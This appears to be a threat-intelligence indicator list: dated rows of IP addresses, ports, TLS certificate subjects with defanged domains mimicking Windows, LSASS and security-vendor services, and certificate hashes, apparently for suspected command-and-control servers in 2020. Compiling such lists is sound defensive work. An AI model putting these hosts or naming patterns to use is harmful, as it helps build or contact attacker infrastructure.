        1/19/20

        45.32.170.9:443

        CN=livecheckpointsrs[.]com

        1de9e9aa8363751c8a71c43255557a97

        1/20/20

        207.148.8.61:443

        CN=ciscocheckapi[.]com

        97ca76ee9f02cfda2e8e9729f69bc208

        1/28/20

        209.222.108.106:443

        CN=timesshifts[.]com

        2bb464585f42180bddccb50c4a4208a5

        1/29/20

        31.7.59.141:443

        CN=updatewinsoftr[.]com

        07f9f766163c344b0522e4e917035fe1

        1/29/20

        79.124.60.117:443

        C=US

        9722acc9740d831317dd8c1f20d8cfbe

        1/29/20

        66.42.86.61:443

        CN=lsassupdate[.]com

        3c9b3f1e12473a0fd28dc37071168870

        1/29/20

        45.76.20.140:443

        CN=cylenceprotect[.]com

        da6ce63f4a52244c3dced32f7164038a

        1/29/20

        45.76.20.140:80

        CN=cylenceprotect[.]com

        da6ce63f4a52244c3dced32f7164038a

        1/30/20

        149.248.5.240:443

        CN=sophosdefence[.]com

        e9b4b649c97cdd895d6a0c56015f2e68

        1/30/20

        144.202.12.197:80

        CN=windefenceinfo[.]com

        c6c63024b18f0c5828bd38d285e6aa58

        1/30/20

        149.248.5.240:80

        CN=sophosdefence[.]com

        e9b4b649c97cdd895d6a0c56015f2e68

        1/30/20

        149.28.246.25:80

        CN=lsasswininfo[.]com

        f9af8b7ddd4875224c7ce8aae8c1b9dd

        1/30/20

        144.202.12.197:443

        CN=windefenceinfo[.]com

        c6c63024b18f0c5828bd38d285e6aa58

        1/30/20

        149.28.246.25:443

        CN=lsasswininfo[.]com

        f9af8b7ddd4875224c7ce8aae8c1b9dd

        1/30/20

        45.77.119.212:443

        CN=taskshedulewin[.]com

        e1dc7cecd3cb225b131bdb71df4b3079

        1/30/20

        45.77.119.212:80

        CN=taskshedulewin[.]com

        e1dc7cecd3cb225b131bdb71df4b3079

        1/30/20

        149.28.122.130:443

        CN=renovatesystem[.]com

        734c26d93201cf0c918135915fdf96af

        1/30/20

        45.32.170.9:80

        CN=livecheckpointsrs[.]com

        1de9e9aa8363751c8a71c43255557a97

        1/30/20

        149.248.58.11:80

        CN=updatewinlsass[.]com

        8c581979bd11138ffa3a25b895b97cc0

        1/30/20

        149.28.122.130:80

        CN=renovatesystem[.]com

        734c26d93201cf0c918135915fdf96af

        1/30/20

        207.148.8.61:80

        CN=ciscocheckapi[.]com

        97ca76ee9f02cfda2e8e9729f69bc208

        1/31/20

        81.17.25.210:443

        CN=update-wind[.]com

        877bf6c685b68e6ddf23a4db3789fcaa

        1/31/20

        31.7.59.141:80

        CN=updatewinsoftr[.]com

        07f9f766163c344b0522e4e917035fe1

        2/2/20

        155.138.214.247:80

        CN=cleardefencewin[.]com

        61df4864dc2970de6dcee65827cc9a54

        2/2/20

        155.138.214.247:443

        CN=cleardefencewin[.]com

        61df4864dc2970de6dcee65827cc9a54

        2/2/20

        45.76.231.195:443

        CN=checkwinupdate[.]com

        d8e5dddeec1a9b366759c7ef624d3b8c

        2/2/20

        45.76.231.195:80

        CN=checkwinupdate[.]com

        d8e5dddeec1a9b366759c7ef624d3b8c

        2/3/20

        46.19.142.154:443

        CN=havesetup[.]net

        cd354c309f3229aff59751e329d8243a

        2/3/20

        95.179.219.169:80

        CN=jomamba[.]best

        80b7001e5a6e4bd6ec79515769b91c8b

        2/3/20

        140.82.60.155:80

        CN=updatemanagir[.]us

        ec16be328c09473d5e5c07310583d85a

        2/3/20

        209.222.108.106:80

        CN=timesshifts[.]com

        2bb464585f42180bddccb50c4a4208a5

        2/3/20

        66.42.118.123:443

        CN=conhostservice[.]com

        6c21d3c5f6e8601e92ae167a7cff721c

        2/4/20

        80.240.18.106:443

        CN=microsoftupdateswin[.]com

        27cae092ad6fca89cd1b05ef1bb73e62

        2/4/20

        95.179.215.228:443

        CN=iexploreservice[.]com

        26010bebe046b3a33bacd805c2617610

        2/12/20

        155.138.216.133:443

        CN=defenswin[.]com

        e5005ae0771fcc165772a154b7937e89

        2/12/20

        45.32.130.5:443

        CN=avrenew[.]com

        f32ee1bb35102e5d98af81946726ec1b

        2/14/20

        45.76.167.35:443

        CN=freeallsafe[.]com

        85f743a071a1d0b74d8e8322fecf832b

        2/14/20

        45.63.95.187:443

        CN=easytus[.]com

        17de38c58e04242ee56a9f3a94e6fd53

        2/17/20

        45.77.89.31:443

        CN=besttus[.]com

        2bda8217bdb05642c995401af3b5c1f3

        2/17/20

        95.179.147.215:443

        CN=windefens[.]com

        57725c8db6b98a3361e0d905a697f9f8

        2/17/20

        155.138.216.133:443

        CN=defenswin[.]com

        c07774a256fc19036f5c8c60ba418cbf

        2/17/20

        104.238.190.126:443

        CN=aaatus[.]com

        4039af00ce7a5287a3e564918edb77cf

        2/17/20

        144.202.83.4:443

        CN=greattus[.]com

        7f0fa9a608090634b42f5f17b8cecff0

        2/17/20

        104.156.245.0:443

        CN=comssite[.]com

        f5bb98fafe428be6a8765e98683ab115

        2/17/20

        45.32.30.162:443

        CN=bigtus[.]com

        698fc23ae111381183d0b92fe343b28b

        2/17/20

        108.61.242.184:443

        CN=livetus[.]com

        8bedba70f882c45f968c2d99b00a708a

        2/17/20

        207.148.15.31:443

        CN=findtus[.]com

        15f07ca2f533f0954bbbc8d4c64f3262

        2/17/20

        149.28.15.247:443

        CN=firsttus[.]com

        88e8551f4364fc647dbf00796536a4c7

        2/21/20

        155.138.136.182:443

        CN=worldtus[.]com

        b31f38b2ccbbebf4018fe5665173a409

        2/25/20

        45.77.58.172:443

        CN=freeoldsafe[.]com

        a46e77b92e1cdfec82239ff54f2c1115

        2/25/20

        45.77.58.172:443

        CN=freeoldsafe[.]com

        a46e77b92e1cdfec82239ff54f2c1115

        2/26/20

        108.61.72.29:443

        CN=myserviceconnect[.]net

        9f551008f6dcaf8e6fe363caa11a1aed

        2/27/20

        216.155.157.249:443

        CN=myserviceupdater[.]com

        4c6a2c06f1e1d15d6be8c81172d1c50c

        2/28/20

        45.77.98.157:443

        CN=topservicesbooster[.]com

        ba4b34962390893852e5cc7fa7c75ba2

        2/28/20

        104.156.250.132:443

        CN=myservicebooster[.]com

        89be5670d19608b2c8e261f6301620e1

        2/28/20

        149.28.50.31:443

        CN=topsecurityservice[.]net

        77e2878842ab26beaa3ff24a5b64f09b

        2/28/20

        149.28.55.197:443

        CN=myyserviceupdater[.]com

        0dd8fde668ff8a301390eef1ad2f9b83

        2/28/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        c88098f9a92d7256425f782440971497

        2/28/20

        63.209.33.131:443

        CN=serviceupdates[.]net

        16e86a9be2bdf0ddc896bc48fcdbb632

        2/29/20

        45.77.206.105:443

        CN=myservicebooster[.]net

        6e09bb541b29be7b89427f9227c30a32

        2/29/20

        140.82.5.67:443

        CN=servicesbooster[.]org

        42d2d09d08f60782dc4cded98d7984ed

        2/29/20

        108.61.209.123:443

        CN=brainschampions[.]com

        241ab042cdcb29df0a5c4f853f23dd31

        2/29/20

        104.156.227.250:443

        CN=servicesbooster[.]com

        f45f9296ff2a6489a4f39cd79c7f5169

        2/29/20

        140.82.10.222:443

        CN=topservicesecurity[.]net

        b9375e7df4ee0f83d7abb179039dc2c5

        2/29/20

        149.28.35.35:443

        CN=topservicesecurity[.]org

        82bd8a2b743c7cc3f3820e386368951d

        2/29/20

        207.148.21.17:443

        CN=topserviceupdater[.]com

        ece184f8a1309b781f912d4f4d65738e

        2/29/20

        45.77.153.72:443

        CN=topservicesupdate[.]com

        8330c3fa8ca31a76dc8d7818fd378794

        3/1/20

        140.82.10.222:80

        CN=topservicesecurity[.]net

        b9375e7df4ee0f83d7abb179039dc2c5

        3/1/20

        207.148.21.17:80

        CN=topserviceupdater[.]com

        ece184f8a1309b781f912d4f4d65738e

        3/1/20

        108.61.90.90:443

        CN=topservicesecurity[.]com

        696aeb86d085e4f6032e0a01c496d26c

        3/1/20

        45.32.130.5:80

        CN=avrenew[.]com

        f32ee1bb35102e5d98af81946726ec1b

        3/2/20

        217.69.15.175:443

        CN=serviceshelpers[.]com

        9a437489c9b2c19c304d980c17d2e0e9

        3/2/20

        155.138.135.182:443

        CN=topservicesupdates[.]com

        b9deff0804244b52b14576eac260fd9f

        3/2/20

        95.179.210.8:80

        CN=serviceuphelper[.]com

        bb65efcead5b979baee5a25756e005d8

        3/2/20

        45.76.45.162:443

        CN=boostsecuritys[.]com

        7d316c63bdc4e981344e84a017ae0212

        3/4/20

        108.61.176.237:443

        CN=yoursuperservice[.]com

        7424aaede2f35259cf040f3e70d707be

        3/4/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        d66cb5528d2610b39bc3cecc20198970

        3/6/20

        188.166.52.176:443

        CN=top-servicebooster[.]com

        f882c11b294a94494f75ded47f6f0ca0

        3/7/20

        149.248.56.113:443

        CN=topservicehelper[.]com

        2a29e359126ec5b746b1cc52354b4adf

        3/8/20

        199.247.13.144:443

        CN=hakunamatatata[.]com

        e2cd3c7e2900e2764da64a719096c0cb

        3/8/20

        95.179.210.8:443

        CN=serviceuphelper[.]com

        bb65efcead5b979baee5a25756e005d8

        3/8/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        d89f6bdc59ed5a1ab3c1ecb53c6e571c

        3/9/20

        194.26.29.230:443

        CN=secondserviceupdater[.]com

        c30a4809c9a77cfc09314a63f7055bf7

        3/9/20

        194.26.29.229:443

        CN=firstserviceupdater[.]com

        bc86a3087f238014b6c3a09c2dc3df42

        3/9/20

        194.26.29.232:443

        CN=fourthserviceupdater[.]com

        3dc6d12c56cc79b0e3e8cd7b8a9c320b

        3/9/20

        194.26.29.234:443

        CN=sixthserviceupdater[.]com

        951e29ee8152c1e7f63e8ccb6b7031c1

        3/9/20

        194.26.29.235:443

        CN=seventhserviceupdater[.]com

        abe1ce0f83459a7fe9c72839fc46330b

        3/9/20

        194.26.29.236:443

        CN=eighthserviceupdater[.]com

        c7a539cffdd230a4ac9a4754c2c68f12

        3/9/20

        194.26.29.237:443

        CN=ninethserviceupdater[.]com

        1d1f7bf2c0eec7a3a0221fd473ddbafc

        3/9/20

        194.26.29.225:443

        CN=seventeenthservicehelper[.]com

        6b1e0621f4d891b8575a229384d0732d

        3/9/20

        194.26.29.227:443

        CN=nineteenthservicehelper[.]com

        38756ffb8f2962f6071e770637a2d962

        3/9/20

        194.26.29.242:443

        CN=thirdservicehelper[.]com

        3b911032d08ff4cb156c064bc272d935

        3/9/20

        194.26.29.244:443

        CN=tenthservicehelper[.]com

        a2d9b382fe32b0139197258e3e2925c4

        3/9/20

        194.26.29.226:443

        CN=eighteenthservicehelper[.]com

        4acbca8efccafd92da9006d0cc91b264

        3/9/20

        194.26.29.243:443

        CN=ninthservicehelper[.]com

        0760ab4a6ed9a124aabb8c377beead54

        3/9/20

        194.26.29.201:443

        CN=secondservicehelper[.]com

        d8a8d0ad9226e3c968c58b5d2324d899

        3/9/20

        194.26.29.202:443

        CN=thirdservicehelper[.]com

        0d3b79158ceee5b6ce859bb3fc501b02

        3/9/20

        194.26.29.220:443

        CN=fourservicehelper[.]com

        831e0445ea580091275b7020f2153b08

        3/11/20

        207.246.67.70:80

        CN=servicesecurity[.]org

        d89f6bdc59ed5a1ab3c1ecb53c6e571c

        3/13/20

        165.227.196.0:443

        CN=twentiethservicehelper[.]com

        977b4abc6307a9b3732229d4d8e2c277

        3/14/20

        45.141.86.91:443

        CN=thirdservice-developer[.]com

        edc2680e3797e11e93573e523bae7265

        3/14/20

        194.26.29.219:443

        CN=firstservisehelper[.]com

        6b444a2cd3e12d4c3feadec43a30c4d6

        3/14/20

        45.141.86.93:443

        CN=fifthservice-developer[.]com

        60e7500c809f12fe6be5681bd41a0eda

        3/15/20

        45.141.86.90:443

        CN=secondservice-developer[.]com

        de9460bd6b1badb7d8314a381d143906

        3/15/20

        45.141.86.84:443

        CN=firstservice-developer[.]com

        6385acd425e68e1d3fce3803f8ae06be

        3/17/20

        45.141.86.96:443

        CN=eithtservice-developer[.]com

        e1d1fb4a6f09fb54e09fb27167028303

        3/17/20

        45.141.86.92:443

        CN=fourthservice-developer[.]com

        5b5375bf30aedfa3a44d758fe42fccba

        3/18/20

        45.141.86.94:443

        CN=sixthservice-developer[.]com

        4d42bea1bfc7f1499e469e85cf75912c

        3/18/20

        108.61.209.121:443

        CN=service-booster[.]com

        692ed54fb1fb189c36d2f1674db47e45

        3/18/20

        134.122.116.114:443

        CN=service-helpes[.]com

        ad0914f72f1716d810e7bd8a67c12a71

        3/18/20

        209.97.130.197:443

        CN=helpforyourservice[.]com

        00fe3cc532f876c7505ddbf5625de404

        3/18/20

        192.241.143.121:443

        CN=serviceshelps[.]com

        e50998208071b4e5a70110b141542747

        3/18/20

        45.141.86.95:443

        CN=seventhservice-developer[.]com

        413ca4fa49c3eb6eef0a6cbc8cac2a71

        3/18/20

        198.211.116.199:443

        CN=actionshunter[.]com

        8e5bedbe832d374b565857cce294f061

        3/18/20

        45.141.86.155:443

        CN=sexyservicee[.]com

        cca37e58b23de9a1db9c3863fe2cd57c

        3/19/20

        194.26.29.239:443

        CN=eleventhserviceupdater[.]com

        7e0fcb78055f0eb12bc8417a6933068d

        3/19/20

        45.141.86.206:443

        CN=servicedhunter[.]com

        fdefb427dcf3f0257ddc53409ff71d22

        3/19/20

        45.141.86.92:443

        CN=service-updateer[.]com

        51ba9c03eac37751fe06b7539964e3de

        3/19/20

        134.122.116.59:443

        CN=servicedbooster[.]com

        db7797a20a5a491fb7ad0d4c84acd7e8

        3/19/20

        134.122.118.46:443

        CN=servicedpower[.]com

        7b57879bded28d0447eea28bacc79fb5

        3/19/20

        134.122.124.26:443

        CN=serviceboostnumberone[.]com

        880982d4781a1917649ce0bb6b0d9522

        3/20/20

        45.141.86.97:443

        CN=ninethservice-developer[.]com

        e4a720edfcc7467741c582cb039f20e0

        3/20/20

        178.62.247.205:443

        CN=top-serviceupdater[.]com

        a45522bd0a26e07ed18787c739179ccb

        3/20/20

        159.203.36.61:443

        CN=yourserviceupdater[.]com

        7b422c90dc85ce261c0a69ba70d8f6b5

        3/20/20

        134.122.20.117:443

        CN=fifthserviceupdater[.]com

        99aa16d7fc34cdcc7dfceab46e990f44

        3/23/20

        165.22.125.178:443

        CN=servicemonsterr[.]com

        82abfd5b55e14441997d47aee4201f6d

        3/24/20

        69.55.60.140:443

        CN=boostyourservice[.]com

        7f3787bf42f11da321461e6db7f295d1

        3/24/20

        45.141.86.98:443

        CN=tenthservice-developer[.]com

        eef29bcbcba1ce089a50aefbbb909203

        3/26/20

        178.79.132.82:443

        CN=developmasters[.]com

        5cf480eba910a625e5e52e879ac5aecb

        3/26/20

        194.26.29.247:443

        CN=thirteenthservicehelper[.]com

        2486df3869c16c0d9c23a83cd61620c2

        5/4/20

        159.65.216.127:443

        CN=info-develop[.]com

        5f7a5fb72c6689934cc5d9c9a681506b

        9/22/20

        69.61.38.155:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

        d37ba4a4b1885e96ff54d1f139bf3f47

        9/22/20

        96.9.225.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

        4408ba9d63917446b31a0330c613843d

        9/22/20

        96.9.209.216:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

        d921dd1ba03aaf37d5011020577e8147

        9/22/20

        107.173.58.176:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

        dfeb6959b62aff0b93ca20fd40ef01a8

        9/22/20

        96.9.225.143:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

        05c03b62dea6ec06006e57fd0a6ba22e

        9/22/20

        69.61.38.156:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

        c14a892f8203a04c7e3298edfc59363a

        9/22/20

        45.34.6.229:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

        7ed16732ec21fb3ec16dbb8df0aa2250

        9/22/20

        45.34.6.226:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

        1788068aff203fa9c51d85bf32048b9c

        9/22/20

        45.34.6.225:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

        0fff2f721ad23648175d081672e77df4

        9/22/20

        107.173.58.185:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

        b960355ba112136f93798bf85e6392bf

        9/22/20

        107.173.58.183:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

        a3d4e6d1f361d9c335effdbd33d12e79

        9/22/20

        107.173.58.175:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

        e13fbdff954f652f14faf11b735c0ef8

        9/22/20

        185.184.223.194:443

        C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

        67310b30bada4f77f8f336438890d8f2

        9/22/20

        109.70.236.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

        ae74cbb9838688363b7928b06963c40a

        9/23/20

        64.44.131.103:443

        C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

        af518cc031807f43d646dc508685bcd3

        9/23/20

        69.61.38.157:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

        c8fd81d6d3c8cbb8256c470a613a7c7b

        9/23/20

        193.142.58.129:443

        C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

        5a22c3c8a0ed6482cad0e2b867c4c10c

        9/23/20

        45.34.6.223:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

        bf598ba46f47919c264514f10ce80e34

        9/23/20

        107.173.58.179:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

        1c8243e2787421373efcf98fc0975031

        9/23/20

        45.34.6.222:443

        C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

        576d65a68900b270155c2015ac4788bb

        9/23/20

        107.173.58.180:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

        69643e9b1528efc6ec9037b60498b94c

        9/23/20

        107.173.58.182:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

        ca9b7e2fcfd35f19917184ad2f5e1ad3

        9/23/20

        45.34.6.221:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

        e5e0f017b00af6f020a28b101a136bad

        9/24/20

        213.252.244.62:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

        8367a1407ae999644f25f665320a3899

        9/24/20

        185.25.50.167:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

        34a78f1233e53010d29f2a4fa944c877

        9/30/20

        88.119.171.75:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

        eaebbe5a3e3ea1d5992a4dfd4af7a749

        10/1/20

        88.119.171.74:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

        adc8cd1285b7ae62045479ed39aa37f5

        10/1/20

        88.119.171.55:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

        bfe1fd16cd4169076f3fbaab5afcbe12

        10/1/20

        88.119.171.67:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

        c8a623eb355d172fc3e083763934a7f7

        10/1/20

        88.119.171.76:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

        0ac5659596008e64d4d0d90dfb6abe7c

        10/1/20

        88.119.171.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

        48003b6b638dc7e79e75a581c58f2d77

        10/1/20

        88.119.171.69:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

        5c75a6bbb7454a04b9ea26aa80dfbcba

        10/1/20

        88.119.171.73:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

        e391c997b757424d8b2399cba4733a60

        10/1/20

        88.119.171.77:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

        035697cac0ee92bb4d743470206bfe9a

        10/1/20

        88.119.171.78:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

        fc133bed713608f78f9f112ed7498f32

        10/1/20

        213.252.244.38:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

        8ead6021e2a5b9191577c115d4e68911

        10/1/20

        107.173.58.184:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

        1c9949d20441df2df09d13778b751b65

        10/1/20

        88.119.174.109:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

        c0ddfc954aa007885b467f8c4f70ad75

        10/1/20

        88.119.174.110:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

        ee63098506cb82fc71a4e85043d4763f

        10/1/20

        88.119.174.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

        422b020be24b346da826172e4a2cf1c1

        10/1/20

        88.119.174.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

        8d8f046e963bcd008fe4bbed01bed4c8

        10/1/20

        88.119.174.117:443

        C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

        c381fb63e9cb6b0fc59dfaf6e8c40af3

        10/1/20

        88.119.174.118:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

        add6b742d0f992d56bede79888eef413

        10/1/20

        88.119.174.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

        9bbd073033e34bfd80f658f0264f6fae

        10/1/20

        88.119.174.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

        9afef617897e7089f59c19096b8436c8

        10/1/20

        88.119.174.120:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

        3f366e5f804515ff982c151a84f6a562

        10/1/20

        88.119.174.107:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

        c2f99054e0b42363be915237cb4c950b

        10/1/20

        88.119.174.125:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

        4ac8ac12f1763277e35da08d8b9ea394

        10/1/20

        88.119.174.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

        7080547306dceb90d809cb9866ed033c

        10/1/20

        88.119.174.127:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

        03037dff61500d52a37efd4b4f520518

        10/1/20

        88.119.174.128:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

        959bed7a2662d7274b303f3b120fddea

        10/1/20

        213.252.244.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

        1d28556cc80df9627c20316358b625d6

        10/1/20

        213.252.244.170:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

        85e65803443046f921b9a0a9b8cc277c

        10/1/20

        213.252.246.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

        9df6ba82461aa0594ead03993c0e4c42

        10/5/20

        5.2.64.113:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

        18aadee1b82482c3cd5ebe32f3628f3f

        10/7/20

        5.2.79.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

        94bc44bd438d2e290516d111782badde

        10/7/20

        88.119.171.94:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

        f0ede92cb0899a9810a67d716cdbebe2

        10/7/20

        5.2.64.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

        e0f9efedd11d22a5a08ffb9c4c2cbb5a

        10/7/20

        5.2.64.135:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

        4aa2acabeb3ff38e39ed1d840124f108

        10/7/20

        5.2.72.202:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

        c04034b78012cca7dcc4a0fb5d7bb551

        10/7/20

        88.119.175.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

        2670bf08c43d995c74b4b83383af6a69

        10/7/20

        213.252.245.71:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

        127cc347b711610c3bcee434eb8bf822

        10/7/20

        213.252.246.144:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

        b3e7ab478ffb0213017d57a88e7b2e3b

        10/7/20

        5.2.64.149:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

        188f603570e7fa81b92906af7af177dc

        10/7/20

        5.2.64.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

        22d7f35e624b7bcee7bb78ee85a7945c

        10/7/20

        88.119.174.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

        12c6e173fa3cc11cc6b09b01c5f71b0c

        10/7/20

        88.119.174.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

        28435684c76eb5f1c4b48b6bbc4b22af

        10/7/20

        88.119.175.214:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

        9c2d64cf4e8e58ef86d16e9f77873327

        10/7/20

        5.2.72.200:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

        f6f484baf1331abf55d06720de827190

        10/7/20

        5.2.79.10:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

        d8eacda158594331aec3ad5e42656e35

        10/7/20

        5.2.79.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

        29032dd12ea17fc37ffff1ee94cc5ba8

        10/7/20

        5.2.79.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

        eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

        10/7/20

        5.2.64.174:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

        442680006c191692fcc3df64ec60d8fa

        10/7/20

        5.2.64.172:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

        0593cbf6b3a3736a17cd64170e02a78d

        10/7/20

        5.2.64.167:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

        38df81824bd8cded4a8fa7ad9e4d1f67

        10/7/20

        5.2.64.182:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

        99dbe71ca7b9d4a1d9f722c733b3f405

        10/7/20

        88.119.171.97:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

        7d7199ffa40c50b6e5b025b8cb2661b2

        10/7/20

        88.119.171.96:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

        f433d25a0dad0def0510cd9f95886fdb

        10/7/20

        96.9.209.217:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

        e84c7aa593233250efac903c19f3f589

        10/7/20

        69.61.38.132:443

        C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

        e6e80f6eb5cbfc73cde40819007dcc53

        10/13/20

        45.147.230.131:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

        4fdeab3dad077589d52684d35a9ea4ab

        10/13/20

        45.147.229.92:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

        b70cdb49b26e6e9ba7d0c42d5f3ed3cb

        10/13/20

        45.147.229.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

        57024c1fe5c4acaf30434ba1f58f9144

        10/13/20

        45.147.229.52:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

        ec5496048f1962494d239d377e53db0c

        10/13/20

        45.147.229.44:443

        C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

        938593ac1c8bdb2c5256540d7c8476c8

        10/14/20

        45.147.230.87:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

        cced46e0a9b6c382a97607beb95f68ab

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        e912980fc8e9ec1e570e209ebb163f65

        10/14/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        39d7160ce331a157d3ecb2a9f8a66f12

        10/14/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        d9ca73fe10d52eef6952325d102f0138

        10/14/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        920d04330a165882c8076c07b00e1d93

        10/14/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        771463611a43ee35a0ce0631ef244dee

        10/14/20

        45.147.229.180:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

        1e4a794da7d3c6d0677f7169fbe3b526

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        9c7fe10135f6ad96ded28fac51b79dfd

        10/15/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

